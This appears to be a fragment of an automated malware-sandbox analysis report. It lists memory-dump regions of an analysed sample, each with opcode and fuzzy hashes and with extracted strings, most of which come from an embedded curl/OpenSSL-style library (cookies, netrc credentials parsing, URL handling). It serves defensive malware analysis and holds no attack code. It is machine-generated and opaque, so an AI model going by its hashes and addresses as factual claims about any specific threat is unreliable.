                                                  • Opcode Fuzzy Hash: 8f2fbfa539fcec0490cdf941720b1a986c0e1f5acbe7873bcb051c4a73b25357
                                                  • Instruction Fuzzy Hash: 6D01ADEB1BC110BDF12284429F14BBA262EE3E3330FF18026B843EE186F6D44A4B1031
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633351582.0000000007230000.00000040.00001000.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7230000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dcdcaee38893a43087d10906067ae1388da8a1b795056dccdea50e1e21f30a32
                                                  • Instruction ID: ac6fc2532848bed45cfde44b4710a0d97c762fc4b2b9598d95b4dfecbbaa5a88
                                                  • Opcode Fuzzy Hash: dcdcaee38893a43087d10906067ae1388da8a1b795056dccdea50e1e21f30a32
                                                  • Instruction Fuzzy Hash: F40180E7229210BEF611C191AF60BFB676FEBC6734F30882BF506D2142D3E80A4A5175
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633537384.00000000072E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d00e7afaff61792bc84f07da9266e41102afb4d8c3de6202648b5b38c32b800
                                                  • Instruction ID: ed73b0ccea0b75cdac17cac644f2d6032e6055d75ea3f378cf9d233d940e6fad
                                                  • Opcode Fuzzy Hash: 3d00e7afaff61792bc84f07da9266e41102afb4d8c3de6202648b5b38c32b800
                                                  • Instruction Fuzzy Hash: E601C4EB17C110BDE52384829B14BF9676EE7D3730FB08066F843EE586E6D50A4B1031
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                  • API String ID: 0-1371176463
                                                  • Opcode ID: 44446b6a928775771e8bb92efb7792806794e3b5534c7ec703cfc5721dedc991
                                                  • Instruction ID: e78fb636bff54b64763bb7a1390d9563fba47cba3a58a102a5bad10a23026cd6
                                                  • Opcode Fuzzy Hash: 44446b6a928775771e8bb92efb7792806794e3b5534c7ec703cfc5721dedc991
                                                  • Instruction Fuzzy Hash: 56B23AB1A08741ABE7356A24EC46B667FD5BF94304F08893CF88D97282E771EC50E752
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                  • API String ID: 0-122532811
                                                  • Opcode ID: 80a786eb4a842b2aa16d367cdf04c88ccc2f836778ea5c28a54c2841f45c2aea
                                                  • Instruction ID: e6be7ab826f3d92fa7736ed4eb8d363bf4ad4e91fd8b96ba896eaebe5806bdd8
                                                  • Opcode Fuzzy Hash: 80a786eb4a842b2aa16d367cdf04c88ccc2f836778ea5c28a54c2841f45c2aea
                                                  • Instruction Fuzzy Hash: 5942E771B08701ABD708DE28CC45BABBBEAFBC4704F04892CF55D97391E775A9148B92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                  • API String ID: 0-3977460686
                                                  • Opcode ID: f6db024203b1f9b4d85e61de53ebb9b02d54aa2431988a37ba956598325535b4
                                                  • Instruction ID: a52a0e0f03107466bbeda9d6e862f8bd7ddb962ac78b85294ad30dc62f59a494
                                                  • Opcode Fuzzy Hash: f6db024203b1f9b4d85e61de53ebb9b02d54aa2431988a37ba956598325535b4
                                                  • Instruction Fuzzy Hash: 1F326B71A483014BC7249F289C413EABFD5BBD5328F154B2DE9A98B3D2E734D9458F82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                  • API String ID: 0-1914377741
                                                  • Opcode ID: 048d7dccb680fa645d44c3a33f69b6b4400815ea72a3a55ef59cb803207e87cd
                                                  • Instruction ID: 571e67efd1c4c92a09c48eb4137495a0bb35ef86e1b58fb245f8134ace03168b
                                                  • Opcode Fuzzy Hash: 048d7dccb680fa645d44c3a33f69b6b4400815ea72a3a55ef59cb803207e87cd
                                                  • Instruction Fuzzy Hash: 8C724A31608B419BEB218A28C4767A67FD2BF90745F048A2DED855B293F7B6DD8CC341
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_530000_file.jbxd
Similarity
• API ID:
• String ID: attempts$ndot$retr$retr$rota$time$use-$usev
• API String ID: 0-2058201250
• Opcode ID: 376a32ada3b7b02ecdbbe8d7719c913acd91871f8e1119bd90e2f22d0effe551
• Instruction ID: c1ccface3019dc4a1148becec208f9adea41b0a3b7a510a7f2895235713754c0
• Opcode Fuzzy Hash: 376a32ada3b7b02ecdbbe8d7719c913acd91871f8e1119bd90e2f22d0effe551
• Instruction Fuzzy Hash: 1B6106A5E0838567E718A622AC56B3B7AC9BBD0304F04483DF9CAD7293FA75DD008253
Strings
Memory Dump Source
• Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_530000_file.jbxd
Similarity
• API ID:
• String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
• API String ID: 0-3476178709
• Opcode ID: cb4161280bf21cc9c632dd0383af9b4d46d6ba99e921977287d105e605063081
• Instruction ID: c44044705dbfb6a58790646d15f02d714383b26f824eb82646dd784c057d095b
• Opcode Fuzzy Hash: cb4161280bf21cc9c632dd0383af9b4d46d6ba99e921977287d105e605063081
• Instruction Fuzzy Hash: 5F31E372B04A4537E7284109CC46F7E045FD3C9B18E6AC67EF60AAB6C3E8B59E144265
Strings
Memory Dump Source
• Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_530000_file.jbxd
Similarity
• API ID:
• String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
• API String ID: 0-2550110336
• Opcode ID: 47b939516f91fc9d3f48de5b5e03a46e82c621ca04421af787345afab33e7736
• Instruction ID: c69861d06fe70ea896896b47463136c46e55a4069fc7784951bc4371904cf214
• Opcode Fuzzy Hash: 47b939516f91fc9d3f48de5b5e03a46e82c621ca04421af787345afab33e7736
• Instruction Fuzzy Hash: 4632353074834CFBE720AAA49C42F7A7797AF42B44F18491CFB44AE2C3DB70A951C656
Strings
Memory Dump Source
• Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_530000_file.jbxd
Similarity
• API ID:
• String ID: $.$;$?$?$xn--$xn--
• API String ID: 0-543057197
• Opcode ID: 0f441abd2904b97a2f6a5640bd6d3d123d978eba23e927b88e0f8249846a2664
• Instruction ID: 4302658d6ab9b7dc41eed986105660836a55659545876c7c2718712fbb879037
• Opcode Fuzzy Hash: 0f441abd2904b97a2f6a5640bd6d3d123d978eba23e927b88e0f8249846a2664
• Instruction Fuzzy Hash: 9D221672A083059BEB249A24DC45B7B7AD9BF90348F04493CFA4AD7692FB39DD04C752
Strings
Memory Dump Source
• Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_530000_file.jbxd
Similarity
• API ID:
• String ID: $d$nil)
• API String ID: 0-394766432
• Opcode ID: 6d05e80f79f1362c02ab36d6a9e98971de75ce6373c427449fcd34aa94e02549
• Instruction ID: 10af5c52426fd3200dee9d811ec694d4bc60e556ee127e9b27a802890edaa990
• Opcode Fuzzy Hash: 6d05e80f79f1362c02ab36d6a9e98971de75ce6373c427449fcd34aa94e02549
• Instruction Fuzzy Hash: A11326706087458FD720CF28C4806AABBE1FF99358F28496DE995DB362D771EC45CB82
APIs
• GetUnicastIpAddressTable.IPHLPAPI(?,?), ref: 005F8FE6
• FreeMibTable.IPHLPAPI(?), ref: 005F917A
• FreeMibTable.IPHLPAPI(?), ref: 005F91A5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_530000_file.jbxd
Similarity
• API ID: Table$Free$AddressUnicast
• String ID: 127.0.0.1$::1
• API String ID: 576766143-3302937015
• Opcode ID: 031b938eb56098692316e597eb75c23f349e354152c8095c6f18ce997fc09315
• Instruction ID: 0e83409dc468b52bf7b10c0818aa32cf4d8e1d73fe74515bf873d858a311184f
• Opcode Fuzzy Hash: 031b938eb56098692316e597eb75c23f349e354152c8095c6f18ce997fc09315
• Instruction Fuzzy Hash: E0A1F4B1C047469BE700DF25C845736BBE4BF95304F158A29F9888B261FB75ED90C792
Strings
Memory Dump Source
• Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_530000_file.jbxd
Similarity
• API ID:
• String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
• API String ID: 0-2555271450
• Opcode ID: 9fd6b72ca00c84835091b2f7a5d8b167094339492af70583c7b5cd1bec956f40
• Instruction ID: b203285c70c8d203d8bd73214ddf98d5fd83eefbc75d69febc48991e5c4b776c
• Opcode Fuzzy Hash: 9fd6b72ca00c84835091b2f7a5d8b167094339492af70583c7b5cd1bec956f40
• Instruction Fuzzy Hash: 74C26971A087458FDB14CE28C49076AFBE2FFC9314F158A2DE9999B352D730ED458B82
Strings
Memory Dump Source
• Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_530000_file.jbxd
Similarity
• API ID:
• String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
• API String ID: 0-2555271450
• Opcode ID: e84065b34755d440fb45e7c5680dd5bd19894dd0440ef3e3148806552cce67b3
• Instruction ID: e83725ef21a0a3ec3155c658d20802208a56effe9e04555b93e1501825fc592e
• Opcode Fuzzy Hash: e84065b34755d440fb45e7c5680dd5bd19894dd0440ef3e3148806552cce67b3
• Instruction Fuzzy Hash: 89826A71A083419FDB14CE28C88576BBBE1BFC5724F188A2DF9A997291D730DC45CB92
Strings
Memory Dump Source
• Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: default$login$macdef$machine$netrc.c$password
                                                  • API String ID: 0-1043775505
                                                  • Opcode ID: b052afbcc5987c17aabe01551eddcf37648ea907dbbae9c9a5b1184552deda7c
                                                  • Instruction ID: d91f255c4a871b75bc98c8f8da410489954b8225c25dd6bab2964cec03aadb96
                                                  • Opcode Fuzzy Hash: b052afbcc5987c17aabe01551eddcf37648ea907dbbae9c9a5b1184552deda7c
                                                  • Instruction Fuzzy Hash: E1E10474948341ABEF219F24D88572B7FD4BF85758F184C2CF88557282E3B9994CCBA2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                                  • API String ID: 0-4201740241
                                                  • Opcode ID: bb0d0017297b573ede332493acd6390fd57fac70fe390befc23da5ba3ce98793
                                                  • Instruction ID: 4e24ac7aabc161e07fe45fab8712fba7ff0c2e725da1a9090f31bfb6c8b2ab0c
                                                  • Opcode Fuzzy Hash: bb0d0017297b573ede332493acd6390fd57fac70fe390befc23da5ba3ce98793
                                                  • Instruction Fuzzy Hash: A962C1B0914741DBEB14CF24C4947AAB7E4FF98304F04962DE88D8B352E774EA94CB96
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                                  • API String ID: 0-2839762339
                                                  • Opcode ID: c1fbbdd7a680b621342d4500a7cd6c1f5ed7ae4188e859135d0757fa54df6969
                                                  • Instruction ID: 5233434305eb4932931173093668d19c7e147bc8efc1b397785fa95a8c102925
                                                  • Opcode Fuzzy Hash: c1fbbdd7a680b621342d4500a7cd6c1f5ed7ae4188e859135d0757fa54df6969
                                                  • Instruction Fuzzy Hash: 0302A4B1A087419FD7259F288842BEBBBD4FF54314F08482DE989C7352EB71E905CB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000003.2629736059.00000000016FD000.00000004.00000020.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_3_16ca000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |$9$|&9$|89$|:9
                                                  • API String ID: 0-4118492142
                                                  • Opcode ID: 5cf720e5c52f150d434871a576fd0b61c77f2588c7f9fa79b85c360c5fed7507
                                                  • Instruction ID: 0552617af884c94e8f0c38969aad0575d8781171e67778d43ddd7180dc3b22ea
                                                  • Opcode Fuzzy Hash: 5cf720e5c52f150d434871a576fd0b61c77f2588c7f9fa79b85c360c5fed7507
                                                  • Instruction Fuzzy Hash: EB82986644E7C29FD7138B748828691BFB1AF17205B0E45EBC5C1CF4F3E669588AC722
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000003.2629736059.00000000016FD000.00000004.00000020.00020000.00000000.sdmp, Offset: 016FE000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_3_16ca000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |$9$|&9$|89$|:9
                                                  • API String ID: 0-4118492142
                                                  • Opcode ID: 5cf720e5c52f150d434871a576fd0b61c77f2588c7f9fa79b85c360c5fed7507
                                                  • Instruction ID: 0552617af884c94e8f0c38969aad0575d8781171e67778d43ddd7180dc3b22ea
                                                  • Opcode Fuzzy Hash: 5cf720e5c52f150d434871a576fd0b61c77f2588c7f9fa79b85c360c5fed7507
                                                  • Instruction Fuzzy Hash: EB82986644E7C29FD7138B748828691BFB1AF17205B0E45EBC5C1CF4F3E669588AC722
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                                  • API String ID: 0-3285806060
                                                  • Opcode ID: 6764546e00409a6fb627b27c10bed6571d28a6e14948aa2499c19c86dd86d5a8
                                                  • Instruction ID: 330bba7f8ab222c5929e19968eb46c29a95a2edc2f2398eaa35a8d3d0776c973
                                                  • Opcode Fuzzy Hash: 6764546e00409a6fb627b27c10bed6571d28a6e14948aa2499c19c86dd86d5a8
                                                  • Instruction Fuzzy Hash: D5D11572A083858BD7289F29C94177ABFD5BF95304F18893DE8D997282DB31DC86C742
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .$@$gfff$gfff
                                                  • API String ID: 0-2633265772
                                                  • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                  • Instruction ID: c0ce04698b3801d583252878dd8515ecf522878aaade1b3cac9ca31de7fe5b8d
                                                  • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                  • Instruction Fuzzy Hash: A6D18D71A0870A8BD714DF29C4803ABBBE2FF94344F18892DE859DB355E770DD498B92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %$&$urlapi.c
                                                  • API String ID: 0-3891957821
                                                  • Opcode ID: 7e03d8bfdd41aaff13e89bb08499098e3d25a16d7acf21bcb80c4310b52128c0
                                                  • Instruction ID: cdb24cc01330b9bc48ec74e1e97e0bde2b06bdd71623362d1704fff1fa127c66
                                                  • Opcode Fuzzy Hash: 7e03d8bfdd41aaff13e89bb08499098e3d25a16d7acf21bcb80c4310b52128c0
                                                  • Instruction Fuzzy Hash: 2522ABB1A083C15BEB2046209CB573A7FD5BB91326F94492FEC8A472C2F638D94CC752
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-227171996
                                                  • Opcode ID: 98c49d650fac7bf0d3ef528bd60175a7c86385c6d8fab1e3b5acef4bd0e1ea68
                                                  • Instruction ID: 078026a4b4ef49f15a7df7b71fef76b164e631093ddc1df4ffab07ae4ca39e48
                                                  • Opcode Fuzzy Hash: 98c49d650fac7bf0d3ef528bd60175a7c86385c6d8fab1e3b5acef4bd0e1ea68
                                                  • Instruction Fuzzy Hash: ABE200B1A083418FD720DF29C584B5AFBF0FB89754F14891EE885D73A1E775E8458B82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .12$M 0.$NT L
                                                  • API String ID: 0-1919902838
                                                  • Opcode ID: 57d5a63f7e47914df8687610ad16483cd8c2d97b3e35f4a9d1cebb0e2cff7e4a
                                                  • Instruction ID: 7ae3b5bfe7a1c7af3a34cc6c8bba0eae34854ba805ca283dfdb6c82cac828e25
                                                  • Opcode Fuzzy Hash: 57d5a63f7e47914df8687610ad16483cd8c2d97b3e35f4a9d1cebb0e2cff7e4a
                                                  • Instruction Fuzzy Hash: 7D51E474A003419BDF11DF20C885BAA7BF4FF94314F188669EC489F252E775DA84CBA6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
                                                  • API String ID: 0-424504254
                                                  • Opcode ID: 91e8af3693660db4b07002c54059b37d06002249d55da8501839092db10c1231
                                                  • Instruction ID: cd20ea221c01e8c092e8f31380cc5a62188bfce994ae276afddb860654c2cfcb
                                                  • Opcode Fuzzy Hash: 91e8af3693660db4b07002c54059b37d06002249d55da8501839092db10c1231
                                                  • Instruction Fuzzy Hash: 8D314863A083415BD336193C5CA5A367EF5BB91315F1C063EEC858B2D2FA658D08C3A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$4
                                                  • API String ID: 0-353776824
                                                  • Opcode ID: 50c0d72112451654a280a81bcbf5724ca1a0055d7a09a76ae70787064f3d8bb7
                                                  • Instruction ID: 3e46e512557c9eb3f7f9521ae9b596f2c6c4d63bdf8388acd793d4ad659d19f0
                                                  • Opcode Fuzzy Hash: 50c0d72112451654a280a81bcbf5724ca1a0055d7a09a76ae70787064f3d8bb7
                                                  • Instruction Fuzzy Hash: B322E331508742CFD314DF28C8806AAF7E0FF86318F158A2DE899D7791E774A895CB96
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp
